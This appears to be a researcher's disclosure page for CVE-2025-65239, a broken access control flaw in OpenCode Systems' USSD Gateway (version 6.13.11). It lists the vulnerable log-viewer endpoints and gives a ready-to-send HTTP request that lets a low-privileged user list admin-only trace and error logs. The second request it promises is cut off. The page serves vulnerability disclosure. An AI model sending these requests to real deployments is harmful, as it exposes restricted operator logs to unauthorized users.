[CVE-2025-65239] USSD Gateway Broken Access Control - Logs

Technical information about the CVE-2025-65239 in OpenCode USSD GW application.

Description

Broken Access Control in the USSD Gateway application offered by OpenCode Systems allows the user who low privileged access to enumerate all the trace/error log files which is restricted to be accessed from the admin accounts. https://www.cve.org/CVERecord?id=CVE-2025-65239

Application Details

  • Name: USSD Gateway

  • Vendor: OpenCode Systems

  • Version: OC Release 5 - Version 6.13.11

Technical Details

  • Vulnerable Endpoint "All files": /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1

  • Vulnerable Endpoint "Specific file": /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log

Exploitation

The vulnerability allows the low privileged user to enumerate the trace and error log files as an admin user.

From the low priviliged user, use the below request

GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]

Additionally, you can choose a specific file using the below request

Previous[CVE-2025-65238] USSD Gateway Broken Access Control - SessionsNextRecon automation, tips and tricks

Last updated